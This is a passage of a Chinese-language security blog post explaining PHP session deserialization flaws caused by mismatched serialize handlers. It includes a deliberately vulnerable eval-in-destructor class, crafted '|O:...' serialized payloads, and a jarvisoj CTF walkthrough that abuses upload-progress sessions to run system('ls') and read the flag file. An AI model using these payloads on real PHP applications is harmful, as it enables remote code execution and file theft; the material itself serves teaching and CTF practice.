<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">session.save_path=&quot;D:\xampp\tmp&quot;    表明所有的session文件都是存储在xampp/tmp下</span><br><span class="line">session.save_handler=files          表明session是以文件的方式来进行存储的</span><br><span class="line">session.auto_start=0                表明默认不启动session</span><br><span class="line">session.serialize_handler=php       表明session的默认序列话引擎使用的是php序列话引擎</span><br></pre></td></tr></table></figure>

<p>PHP中有多种session的序列话引擎，当我设置session为<code>$_SESSION[&quot;name&quot;] = &quot;Threezh1&quot;;</code>时。不同的引擎保存的session文件内容如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">php: </span><br><span class="line">    name|s:8:&quot;Threezh1&quot;;</span><br><span class="line">    存储方式是，键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值</span><br><span class="line"></span><br><span class="line">php_binary:</span><br><span class="line">    names:8:&quot;Threezh1&quot;;</span><br><span class="line">    存储方式是，键名+竖线+经过serialize()函数序列处理的值</span><br><span class="line"></span><br><span class="line">php_serialize(php&gt;5.5.4):</span><br><span class="line">    a:1:&#123;s:4:&quot;name&quot;;s:8:&quot;Threezh1&quot;;&#125;</span><br><span class="line">    存储方式是，经过serialize()函数序列化处理的值</span><br></pre></td></tr></table></figure>

<p>切换不同引擎使用的函数为：<code>ini_set(&#39;session.serialize_handler&#39;, &#39;需要设置的引擎&#39;);</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">ini_set(&apos;session.serialize_handler&apos;, &apos;php_serialize&apos;);</span><br><span class="line">session_start();</span><br><span class="line">// do something</span><br></pre></td></tr></table></figure>

<h3 id="Session反序列化漏洞的原理："><a href="#Session反序列化漏洞的原理：" class="headerlink" title="Session反序列化漏洞的原理："></a>Session反序列化漏洞的原理：</h3><p>如果在PHP在反序列化存储的<code>$_SESSION</code>数据时使用的引擎和序列化使用的引擎不一样，会导致数据无法正确第反序列化。如果session值可控，则可通过构造特殊的session值导致反序列化漏洞。</p>
<p>文章中有一个简单的例子：</p>
<p>test1.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">ini_set(&apos;session.serialize_handler&apos;, &apos;php_serialize&apos;);</span><br><span class="line">session_start();</span><br><span class="line">$_SESSION[&quot;spoock&quot;]=$_GET[&quot;a&quot;];</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>test2.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">ini_set(&apos;session.serialize_handler&apos;, &apos;php&apos;);</span><br><span class="line">session_start();</span><br><span class="line">class lemon &#123;</span><br><span class="line">    var $hi;</span><br><span class="line">    function __construct()&#123;</span><br><span class="line">        $this-&gt;hi = &apos;phpinfo();&apos;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __destruct() &#123;</span><br><span class="line">         eval($this-&gt;hi);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>通过源码可以得知，test1中使用的session解析引擎是php_serialize，test2使用的是php。</p>
<p>并且在test1中，<code>SESSION[&quot;spoock&quot;]</code>的值是可控的。</p>
<p>访问：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/test1.php?a=|O:5:%22lemon%22:1:&#123;s:2:%22hi%22;s:16:%22echo%20%27Threezh1%27;%22;&#125;</span><br></pre></td></tr></table></figure>

<p>a参数的值为“|” + 一个序列化的对象。</p>
<p>再访问：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/test2.php</span><br></pre></td></tr></table></figure>

<p>返回：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Threezh1</span><br></pre></td></tr></table></figure>

<p>可知我们在session中的解析过程中，对我们的payload进行了反序列化。为什么会出现这种情况呢？</p>
<h3 id="payload的构造"><a href="#payload的构造" class="headerlink" title="payload的构造"></a>payload的构造</h3><p>先看两个解析引擎存储session的格式：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">php: </span><br><span class="line">    name|s:8:&quot;Threezh1&quot;;</span><br><span class="line">    存储方式是，键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值</span><br><span class="line"></span><br><span class="line">php_serialize(php&gt;5.5.4):</span><br><span class="line">    a:1:&#123;s:4:&quot;name&quot;;s:8:&quot;Threezh1&quot;;&#125;</span><br><span class="line">    存储方式是，经过serialize()函数序列化处理的值</span><br></pre></td></tr></table></figure>

<p>思路：</p>
<p>因为储存session的页面(test1)使用的是php_serialize解析引擎，如果我们把session的值中添加一个“|”，在test2页面中使用php解析引擎解析的过程中，就会把“|”前面的值作为一个session键名，对“|”后面就会进行一个反序列化操作。</p>
<p>“|”后面的序列化对象生成：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class lemon &#123;</span><br><span class="line">    var $hi;</span><br><span class="line">    function __construct()&#123;</span><br><span class="line">        $this-&gt;hi = &apos;phpinfo();&apos;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __destruct() &#123;</span><br><span class="line">         eval($this-&gt;hi);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$a = new lemon();</span><br><span class="line">$a-&gt;hi = &quot;echo &apos;Threezh1&apos;;&quot;;</span><br><span class="line">echo serialize($a)</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>但是直接这样利用的话，局限性还是太大了。</p>
<p>但在<a href="http://www.91ri.org/15925.html" target="_blank" rel="noopener">有趣的php反序列化总结</a>中介绍了另一种Session反序列化漏洞的利用方式。</p>
<p>当PHP中<code>session.upload_progress.enabled</code>打开时，php会记录上传文件的进度，在上传时会将其信息保存在<code>$_SESSION</code>中。<a href="https://bugs.php.net/bug.php?id=71101" target="_blank" rel="noopener">详情</a>。</p>
<p>条件：</p>
<ol>
<li>session.upload_progress.enabled = On (是否启用上传进度报告)</li>
<li>session.upload_progress.cleanup = Off (是否上传完成之后删除session文件)</li>
</ol>
<p>上传文件进度的报告就会以写入到session文件中，所以我们可以设置一个与session.upload_progress.name同名的变量(默认名为PHP_SESSION_UPLOAD_PROGRESS)，PHP检测到这种同名请求会在<code>$_SESSION</code>中添加一条数据。我们就可以控制这个数据内容为我们的恶意payload。</p>
<p>本打算复现：<a href="http://www.91ri.org/15925.html" target="_blank" rel="noopener">有趣的php反序列化总结</a>,但在传递payload的时候，payload如果存在”|”。session就会为空，还没有找到解决的方法，如果有师傅遇到同样的问题，还望师傅帮忙解答。</p>
<h3 id="jarvisoj-web-writeup-PHPINFO"><a href="#jarvisoj-web-writeup-PHPINFO" class="headerlink" title="jarvisoj-web-writeup PHPINFO"></a>jarvisoj-web-writeup PHPINFO</h3><p>题目地址：<a href="http://web.jarvisoj.com:32784/" target="_blank" rel="noopener">http://web.jarvisoj.com:32784/</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">//A webshell is wait for you</span><br><span class="line">ini_set(&apos;session.serialize_handler&apos;, &apos;php&apos;);</span><br><span class="line">session_start();</span><br><span class="line">class OowoO</span><br><span class="line">&#123;</span><br><span class="line">    public $mdzz;</span><br><span class="line">    function __construct()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;mdzz = &apos;phpinfo();&apos;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __destruct()</span><br><span class="line">    &#123;</span><br><span class="line">        eval($this-&gt;mdzz);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">if(isset($_GET[&apos;phpinfo&apos;]))</span><br><span class="line">&#123;</span><br><span class="line">    $m = new OowoO();</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">    highlight_string(file_get_contents(&apos;index.php&apos;));</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>开头将session的解析引擎定义为了php。</p>
<p>访问：<a href="http://web.jarvisoj.com:32784/index.php?phpinfo" target="_blank" rel="noopener">http://web.jarvisoj.com:32784/index.php?phpinfo</a> 可看到session.upload_progress.enabled，session.upload_progress.cleanup都符合条件。</p>
<p>于是构造一个upload.html</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=&quot;http://web.jarvisoj.com:32784/index.php&quot; method=&quot;POST&quot; enctype=&quot;multipart/form-data&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;hidden&quot; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot; value=&quot;123&quot; /&gt;</span><br><span class="line">    &lt;input type=&quot;file&quot; name=&quot;file&quot; /&gt;</span><br><span class="line">    &lt;input type=&quot;submit&quot; /&gt;</span><br><span class="line">&lt;/form&gt;</span><br></pre></td></tr></table></figure>

<p>poc.php：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class OowoO</span><br><span class="line">&#123;</span><br><span class="line">    public $mdzz;</span><br><span class="line">&#125;</span><br><span class="line">$a = new OowoO();</span><br><span class="line">$a-&gt;mdzz = &quot;print_r(scandir(__dir__));&quot;;</span><br><span class="line">echo serialize($a);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>生成序列化的值为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:5:&quot;OowoO&quot;:1:&#123;s:4:&quot;mdzz&quot;;s:22:&quot;print_r(system(&apos;ls&apos;));&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>在上传的时候抓包，修改上传的内容为序列化的值前加一个“|”。即可遍历目录。</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190929223811-c32575ee-e2c6-1.jpeg" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190929223811-c32575ee-e2c6-1.jpeg" alt="img"></a></p>
<p>再从phpinfo中的SCRIPT_FILENAME字段得到根目录地址：<code>/opt/lampp/htdocs/</code>,构造得到payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:5:&quot;OowoO&quot;:1:&#123;s:4:&quot;mdzz&quot;;s:88:&quot;print_r(file_get_contents(&apos;/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php&apos;));&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>得到flag：</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190929223820-c89a06de-e2c6-1.jpeg" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190929223820-c89a06de-e2c6-1.jpeg" alt="img"></a></p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><ul>
<li><a href="https://www.k0rz3n.com/2018/11/19/一篇文章带你深入理解PHP反序列化漏洞/" target="_blank" rel="noopener">https://www.k0rz3n.com/2018/11/19/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/</a></li>
<li><a href="https://www.anquanke.com/post/id/159206" target="_blank" rel="noopener">https://www.anquanke.com/post/id/159206</a></li>
<li><a href="https://chybeta.github.io/2017/07/05/jarvisoj-web-writeup/#PHPINFO" target="_blank" rel="noopener">https://chybeta.github.io/2017/07/05/jarvisoj-web-writeup/#PHPINFO</a></li>
</ul>

    </div>

    
    
    
        
      

      <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
              
                <a href="/2019/10/16/xss漏洞挖掘思路/" rel="next" title="xss漏洞挖掘思路">
                  <i class="fa fa-chevron-left"></i> xss漏洞挖掘思路
                </a>
              
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
              
                <a href="/2019/10/16/初探phar反序列化/" rel="prev" title="初探phar反序列化">
                  初探phar反序列化 <i class="fa fa-chevron-right"></i>
                </a>
              
            </div>
          </div>
        
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

        </div>
        
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">
        
        
        
        
      

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Private类型"><span class="nav-number">1.</span> <span class="nav-text">Private类型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Protected类型"><span class="nav-number">2.</span> <span class="nav-text">Protected类型</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Phar反序列化"><span class="nav-number"></span> <span class="nav-text">Phar反序列化</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#phar文件的结构："><span class="nav-number">1.</span> <span class="nav-text">phar文件的结构：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#生成一个phar文件："><span class="nav-number">2.</span> <span class="nav-text">生成一个phar文件：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞利用条件"><span class="nav-number">3.</span> <span class="nav-text">漏洞利用条件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#phar受影响的文件操作函数："><span class="nav-number">4.</span> <span class="nav-text">phar受影响的文件操作函数：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞的利用实例："><span class="nav-number">5.</span> <span class="nav-text">漏洞的利用实例：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#一个简单的例子"><span class="nav-number">5.1.</span> <span class="nav-text">一个简单的例子</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#绕过文件格式限制"><span class="nav-number">5.2.</span> <span class="nav-text">绕过文件格式限制</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#配合PHP内核哈希表碰撞攻击"><span class="nav-number">5.3.</span> <span class="nav-text">配合PHP内核哈希表碰撞攻击</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#原生类序列化-ZipArchive-open"><span class="nav-number"></span> <span class="nav-text">原生类序列化(ZipArchive::open)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#原生类魔法函数-soapClient类"><span class="nav-number"></span> <span class="nav-text">原生类魔法函数(soapClient类)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Session反序列化"><span class="nav-number"></span> <span class="nav-text">Session反序列化</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#PHP中的session保存"><span class="nav-number">1.</span> <span class="nav-text">PHP中的session保存</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Session反序列化漏洞的原理："><span class="nav-number">2.</span> <span class="nav-text">Session反序列化漏洞的原理：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#payload的构造"><span class="nav-number">3.</span> <span class="nav-text">payload的构造</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#jarvisoj-web-writeup-PHPINFO"><span class="nav-number">4.</span> <span class="nav-text">jarvisoj-web-writeup PHPINFO</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考"><span class="nav-number"></span> <span class="nav-text">参考</span></a></div>
        
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">su33er</p>
  <div class="site-description" itemprop="description">同志###我要向你学习!</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">4</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
    
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


        
      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">su33er</span>
</div>
  <!--<div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.9.0
  </div>
-->
  <span class="post-meta-divider">|</span>
  <div class="theme-info">
      
    Theme – <a href="https://muse.theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.4.1
  </div>

        












        
      </div>
    </footer>
  </div>
  
  <script src="/lib/anime.min.js?v=3.1.0"></script>
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script src="/js/utils.js?v=7.4.1"></script><script src="/js/motion.js?v=7.4.1"></script>
<script src="/js/schemes/muse.js?v=7.4.1"></script>
<script src="/js/next-boot.js?v=7.4.1"></script>



  





















  

  

  

  


  

  
  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  

</body>
</html>
